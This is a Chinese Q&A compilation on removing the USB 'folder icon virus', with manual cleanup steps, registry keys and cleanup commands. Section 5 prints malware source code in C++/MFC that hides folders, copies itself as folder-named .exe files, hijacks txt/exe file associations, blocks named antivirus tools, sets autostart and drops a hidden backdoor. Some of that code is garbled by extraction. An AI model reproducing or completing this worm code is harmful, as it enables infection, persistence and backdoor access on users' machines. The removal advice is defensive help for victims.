文件夹图标病毒

1. 怎样彻底清除文件夹图标病毒

解决方案：

专杀清除方法：
下载金山毒霸等杀毒软件。

手工清除方法：
1、结束病毒进程。打开超级巡警，选择进程管理功能，终止进程XP-290F2C69.EXE（后8位随机），winvcreg.exe，2080.exe（随机名）。
2、删除病毒在System32生成的以下文件：
com.run dp1.fne eAPI.fne internet.fne krnln.fnr og.dll og.edt RegEx.fnr fne spec.fne ul.dll XP-290F2C69.EXE winvcreg.exe 2080.EXE（随机名）
3、删除病毒的启动项，删除以下启动项：
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”里的XP-290F2C69.EXE（后8位随机）；
“C:\Documents and Settings\Administrator\“开始”菜单\程序\启动” 里的“.lnk”。
4、点击“开始”---“运行”----输入“cmd” ，进入命令提示符，然后进入U盘所在的根目录，具体操作如下，比如U盘盘符位G，那么依次运行如下命令（第一行的“G:”为U盘盘符）：
cd /d G:
for /f "delims=" %a in ('dir /b /ad') do (del /a /f /q "%a.exe")
for /f "delims=" %a in ('dir /b /adh') do (attrib -s -h -r "%a")

2. 崔老师急救！！电脑和移动硬盘中了文件夹图标病毒！！

进安全模式，插上你的移动硬盘，
开始——运行——输入“cmd”然后回车——输入命令“你的移动硬盘盘符:"(比如h:即H盘）——输入命令"del autorun.inf"回车——输入命令
"del a.exe"回车，如果你有多个盘，重复此过程，如果提示删除不了，那么输入盘符命令后输入"attrib h:\autorun.inf -h -r -a -s"回车,类似地。输入命令"attrib h:\a.exe -h -r -a -s"回车，然后再重复del命令.还不行就用冰刃，找到磁盘的那个文件，删了它。

3. exe格式的文件夹图标病毒，怎么杀毒

手工清除方法：
1、结束病毒进程。打开超级巡警，选择进程管理功能，终止进程XP-290F2C69.EXE（后8位随机），winvcreg.exe，2080.exe（随机名）。
2、删除病毒在System32生成的以下文件：
com.run dp1.fne eAPI.fne internet.fne krnln.fnr og.dll og.edt RegEx.fnr fne spec.fne ul.dll XP-290F2C69.EXE winvcreg.exe 2080.EXE（随机名）
3、删除病毒的启动项，删除以下启动项：
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”里的XP-290F2C69.EXE（后8位随机）；
“C:\Documents and Settings\Administrator\“开始”菜单\程序\启动” 里的“ .lnk”。
4、手工删除后缀为exe的文件,然后显示被隐藏的文件夹。点击“开始”---“运行”----输入“cmd” ，进入命令提示符，然后进入你U盘所在的根目录，具体操作如下，比如你的U盘盘符位G，那么就输入“g：”在回车就可以了。最后，输入如下命令：attrib -r -a -s -h *.* /s /d。

4. 文件夹图标病毒怎么彻底杀干净

这个是你中了U盘文件夹exe病毒，现在U盘病毒90%是kido病毒，kido病毒虽然很多杀软能杀，但是都没处理掉他的母体。而那些文件夹并没有真的丢失，只是被隐藏了。
用金山U盘专杀和金山网盾这两个软件，网络一下就找到了。先运行金山网盾，点击一键修复，处理掉病毒和系统错误。然后再运行金山U盘专杀这个工具，勾选全盘扫描，他能处理掉病毒母体和那些被隐藏的文件夹，还能修复一些U盘被感染的文件。

5. 文件夹图标病毒的病毒源代码

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,\);
}
//此处只在系统根目录下有效
sprintf(HiJack,%s%s\,DirUrl,AfxGetApp()->m_pszAp pName);
//判断是否存在。
可以打开
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,explorer.exe %s,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持txt、exe文件，并屏蔽常用安全工具
//定义特征字符串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={USBCleaner,
Kis,
Kav,
IceSword,
Kill,
WSYSCHECK,
360};
//获取参数并判断
if(strcmp(m_lpCmdLine,))//如果有参数
{
//判断特征字符串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strp(m_lpCmdLine)),
_strupr(_strp(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(.)) 1;
CString cmd;
// if(!wcscmp(ext,_T(txt)))
if(strstr(m_lpCmdLine,_T(.txt))||strstr(m_lpCmdL ine,_T(.TXT)))
{
cmd.Format(%s %s,notepad.exe,m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(.exe))||strstr(m_lpCmdL ine,_T(.EXE)))
{
//此处不完美。
判断文件名
if(!check)
{
// AfxMessageBox(文件已损坏！);
::MessageBox(NULL,文件已损坏！请重新安装应用程序！,Microsoft,MB_OK);
return FALSE;
}
else
cmd.Format(%s,m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打开文件
OpenFuckFile();
3、自启动及实现劫持exe、txt文件
//向系统目录下拷贝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
CloseHandle(hMole);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,\SysKernel.exe);
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//写注册表。
弄个自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysKernel,REG_SZ,FileNew,0,0);
//写注册表，进行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,%s %%1,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ txtfile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ exefile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
4、释放后门，并启动之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, \SysService.exe);
ReleaseResource(IDR_BIN, BIN, strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//实现后门自启动
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysService,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍历磁盘并拷贝自身
//遍历系统磁盘
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
LPSTR lp;
CString strLogdrive;
//获得实际存储驱动器号的字符串长度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字符串不为空。
则表示有正常的驱动器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干坏事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(*.*);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
// CloseHandle(hMole);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,%s%s,finder.GetFilePath(),.exe );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

6. 求救：U盘里正常的文件夹被隐藏，生成同名并加EXE后缀的文件夹图标病毒

我杀过这种病毒 不过方法比较笨 首先 windows 清理助手 把机器中的木马杀掉 然后把隐藏的文件现出来 把后缀名为。exe的文件删掉 千万不要落删了 否则前功尽弃 再把隐藏的正常文件夹属性改成不隐藏

我的意思就是彻底杀毒的方法 首先把你电脑上的病毒木马杀干净

7. 文件夹图标类病毒的介绍

文件夹图标类病毒是一类恶意病毒，它会将所有根目录下和桌面上的文件夹全部隐藏，并将自己的副本命名为文件夹的名字。由于病毒的图标就是文件夹图标，如果没有显示扩展名的话很容易反复感染病毒。并且由于病毒的机理，会在硬盘上产生大量的病毒副本，即使副本被清理掉了，恢复隐藏的文件夹也是一件不容易的事情。

8. 我电脑中了文件夹图标病毒，如何彻底根除

安全模式运行病毒扫描，把所有的带毒文件删除，然后运行regedit，检查：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面如果有"RavTimeXP"
"RavTimXP"就删掉；检查：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup下面如果有"RavTimXP"，就删掉

9. 文件夹图标病毒

可执行文件可以正常打开吗？ 最好把一个.exe发上来看看。你参考下这帖http://www.arswp.com/bbs/thread-41333-1-1.html
或先下载U盘专杀杀一下（附文件夹图标专杀）http://www.orsoon.com/Soft/426.html

清理电脑里的病毒

1.建议使用XDelBox删除以下文件：(XDelBox1.8动物家园版下载)删除以下文件：
使用说明：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择剪贴板导入不检查路径，导入后记得勾选抑制其再生，在要删除文件上点击右键，选择立刻重启删除，电脑会重启进入DOS界面进行删除操作（重启计算机以后会有一个系统菜单选择Go Xdelbox To Del Files）。运行xdelbox前最好卸载所有可移动存储设备。

c:\windows\ttry.exe
c:\windows\tsay.exe

2.删除重启后使用SREng修复下面各项：

启动项目 －－ 注册表之如下项删除：
[msfsa] <C:\windows\tsay.exe>

U盘没干净前，如果再往电脑里复制文件，可能会再度感染病毒！

使用USBCLEANER
下载地址：http://www.usbcleaner.cn/download.htm
Autorun病毒防御者
下载地址：http://www.rensoft.com.cn/releases/1.html
首先查杀U盘，然后在全面扫描硬盘，最后用文件夹图标类病毒专杀工具查杀。重起开机请不要插U盘。

10. 怎样杀WINFILE（文件夹图标）病毒

WINFILE病毒处理方法
我的电脑里感染了"winfile"的病毒，有一个文件夹，在我的每个磁盘里都有，不知怎么去掉？我怎么办呢？
回复：安全模式运行病毒扫描，把所有的带毒文件删除，然后运行regedit，检查：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面如果有"RavTimeXP" "RavTimXP"就删掉；检查：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup下面如果有"RavTimXP"，就删掉

老道你好，小生有一问题请指教。机子感染了winfile病毒，本来前面有帖子教如何清除。但是现在一个重要的问题是：诺顿杀毒软件打不开，regedit也运行不到！！这咋整？进入安全模式也一样，完全没有办法，手头又没有其他杀毒软件。诺顿重装了也没用。请老道救小生一救，谢！！
回复：到安全模式，找到windows目录下的regedit.exe，改其名为regedit.com，双击，你就可以绕过木马的控制进入注册表编辑。注册表内你首先需要改回的是HKEY_CLASSES_ROOT\exefile\shell\open\command这里的默认值，正确值是"%1" %*，然后再按照前面的帖子处理。记住：要一次弄干净！否则白玩。

老道: 你好我朋友的电脑每一个盘都有winfile这个文件而且在注册表里也撤不掉,如果都撤了,可是点击任一个盘,都又出现了,杀毒软件也不行. 我该如何? 谢谢!
回复：各盘的根目录仔细看看，估计有自启动的文件，比如Autorun或者folder.htt之类。病毒也可能改注册表的关联，你到HKEY_CLASSES_ROOT\Folder\shell\explore\command这里看看，正确值是：%SystemRoot%\Explorer.exe /e /idlist,%I,%L

大虾们教教小鸟怎么把WINFILE杀掉！

[winfile.exe]
[病毒名]：I-Worm.Wukill
[破坏方法]：这个病毒采用文件夹图标，具有很大迷惑性。该病毒运行后，会将自己大量复制到其他目录中。

一、 病毒首次运行时将显示"This File Has Been Damage!"；

二、 将自己复制到windows目录下并改名为Mstray.exe；

三、 修改注册表： HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的；

四、 枚举磁盘目录，在每个根目录下释放下列文件：
winfile.exe 病毒主体程序
comment.htt 利用IE漏洞调用同一个目录下的"winfile.exe"，属性为隐藏。
desktop.ini 系统为隐藏。采用web方式浏览文件夹时，系统会调用该文件，该文件调
用comment.htt ，从而激活病毒。

五、 病毒修改注册表，隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。
这样，用户看不到comment.htt和Desktop.ini， winfile.exe被隐藏后缀明，又是文件
夹图标，用户极容易认为是文件夹而点击。
同时病毒在当前路径下生成的自身拷贝，名称采用上级目录，或者是当前窗口的标题，
增加隐蔽性。

六、病毒调用Outlook发送携带病毒的信件。

手工清除:(在没有杀毒软件的情况下) 首先:找到Mstray.exe(注意这个是系统 和隐藏的文件,所以大家应该知道怎 么才能找到它了,在系统文件夹下), 删除掉. 并修改注册表,去掉对应的启动项. 接着:利用的Windows的搜索功能,搜索所
有的:
Winfile.exe,comment.htt, desktop.ini(注意:查看->去掉系 统保护,去掉隐藏)
删除!注意还得清楚不要删错了哦! 有些desktop.ini是windows原有 的文件)
最后:查找硬盘内所以的[*.exe]文件, (注意:如上),你会发现好多的文件夹 图标形式的.exe 文件,删除掉所有 这些文件.一切OK!